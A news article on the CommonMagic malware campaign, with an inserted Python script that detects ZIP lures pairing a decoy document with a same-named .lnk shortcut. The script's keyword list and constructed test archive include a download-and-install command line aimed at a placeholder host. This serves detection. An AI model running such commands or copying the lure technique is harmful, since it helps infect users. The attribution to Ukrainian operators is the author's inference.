Security researchers have found active malware infections in a number of organisations in the Donetsk, Lugansk, and Crimea regions of Ukraine.
The malware appears to have been delivered by a phishing campaign, although Kaspersky's researchers have not yet confirmed the exact initial access vector. The affected organisations are in the government, agriculture, and transportation sectors.
The payload is installed by tricking victims into opening what appear to be official documents, such as one titled "Results of the State Duma elections in the Republic of Crimea" and another "Ministry of Finance Decree No. 176". The documents are written in Russian, in Cyrillic script, and contain email addresses on .ru domains.
The documents are only a decoy, however. Each is delivered in a ZIP archive alongside a .lnk file, in some cases carrying the same name as the decoy document, and it is the .lnk file that begins the infection chain.
When the .lnk file is opened, it downloads and runs an MSI installer, which in turn creates a number of folders and files and registers a Task Scheduler job so that the malware is run persistently.
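The archive layout described above lends itself to a simple triage check at the mail gateway or in a sandbox: a ZIP that pairs a document with a .lnk of the same name is a strong lure signal on its own, and the LNK body usually carries the download or installer command in plain text. The following Python script is an added example, not code from this article or from Kaspersky. It unpacks a ZIP in memory, flags every .lnk entry that shares its name with a document entry, verifies the fixed LNK header signature, and searches the body for installer and download strings in both ASCII and UTF-16LE (the encoding Windows uses for LNK string data). The archive contents, the file names and the https://example.invalid URL are constructed for the example and are not from the real samples.

```python
import io
import zipfile

# Fixed 20-byte start of every Shell Link file: HeaderSize 0x4C followed by the
# LinkCLSID {00021401-0000-0000-C000-000000000046} in little-endian GUID form.
LNK_MAGIC = (b"\x4c\x00\x00\x00"
             b"\x01\x14\x02\x00\x00\x00\x00\x00\xc0\x00\x00\x00\x00\x00\x00\x46")

# Extensions treated as "document" entries when looking for name collisions.
DOC_EXTS = {".doc", ".docx", ".pdf", ".xls", ".xlsx", ".rtf", ".odt"}

# Strings a downloader/installer LNK tends to carry in its argument or command data.
SUSPICIOUS = [b"msiexec", b"http://", b"https://", b"powershell", b"cmd.exe", b".msi"]


def _stem_ext(name):
    """Split a ZIP entry name into (lower-case stem, lower-case extension)."""
    base = name.rsplit("/", 1)[-1]
    stem, dot, ext = base.rpartition(".")
    if not dot:
        return base.lower(), ""
    return stem.lower(), "." + ext.lower()


def lnk_indicators(blob):
    """Return indicator strings found in the raw bytes of one LNK entry."""
    indicators = []
    if blob.startswith(LNK_MAGIC):
        indicators.append("valid LNK header")
    for kw in SUSPICIOUS:
        # StringData in a LNK is UTF-16LE when the IsUnicode flag is set, so check
        # both encodings rather than relying on an ASCII match.
        if kw in blob or kw.decode().encode("utf-16-le") in blob:
            indicators.append("contains " + kw.decode())
    return indicators


def scan_zip(data):
    """Scan ZIP bytes; return one finding dict per .lnk entry with its indicators."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        names = zf.namelist()
        stems = {}
        for n in names:
            stem, ext = _stem_ext(n)
            stems.setdefault(stem, set()).add(ext)
        for n in names:
            stem, ext = _stem_ext(n)
            if ext != ".lnk":
                continue
            finding = {"entry": n, "indicators": []}
            # Explorer never shows the .lnk extension, so "Decree.lnk" next to
            # "Decree.docx" is displayed as a second copy of the document.
            if stems[stem] & DOC_EXTS:
                finding["indicators"].append("shares name with a document entry")
            finding["indicators"].extend(lnk_indicators(zf.read(n)))
            findings.append(finding)
    return findings


def build_sample_archive():
    """Constructed test archive: a decoy document plus a LNK named after it.

    The LNK is a stub with the real 76-byte header size and a hypothetical
    msiexec command line; it is not a real sample and does nothing if opened.
    """
    command = "cmd.exe /c msiexec /i https://example.invalid/update.msi /quiet"
    lnk = LNK_MAGIC + b"\x00" * 56 + command.encode("utf-16-le")
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("Ministry of Finance Decree No. 176.docx", b"decoy content")
        zf.writestr("Ministry of Finance Decree No. 176.lnk", lnk)
        zf.writestr("readme.txt", b"unrelated entry")
    return buf.getvalue()


if __name__ == "__main__":
    for f in scan_zip(build_sample_archive()):
        print(f["entry"])
        for ind in f["indicators"]:
            print("  -", ind)
```

In practice the name-collision check alone is enough to quarantine an attachment for review: there is no legitimate reason for a document to ship with a shortcut of the same name, and because Explorer hides the .lnk extension regardless of the "hide extensions for known file types" setting, the victim sees two apparently identical documents and has no visual cue which one is the shortcut.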
“When the potential victim activates the LNK file included in the ZIP file, it triggers a chain of events that lead to the infection of the computer with a previously unseen malicious framework that we named CommonMagic,” Kaspersky’s researchers said in a blog post.
“The malware and techniques used in this campaign are not particularly sophisticated, but are effective, and the code has no direct relation to any known campaigns.”
Once fully installed, the CommonMagic framework drops a backdoor capable of taking a screenshot every three seconds and collecting files of selected types from attached USB devices. Additional executables are fetched from a OneDrive folder, and the same folder serves as the drop point for the encrypted data exfiltrated to whichever threat actor is behind the malware.
Beyond that, though, not much else is yet known about the campaign.
“So far, we have found no direct links between the samples and data used in this campaign and any previously known actors,” Kaspersky said. “However, the campaign is still active, and our investigation continues. So, we believe that further discoveries may reveal additional information about this malware and the threat actor behind it.”
All that being said, it is hard not to attribute this campaign to Ukrainian operators, given the targets are in Russian-annexed regions of the country and appear to be Russian speakers with an interest in official Russian documentation.
Cyber activity between the two countries has risen dramatically since Russia's annexation of Crimea in 2014, and in particular since Russia's illegal full-scale invasion of the country in February 2022.
David Hollingworth has been writing about technology for over 20 years, and has worked for a range of print and online titles in his career. He is enjoying getting to grips with cyber security, especially when it lets him talk about Lego.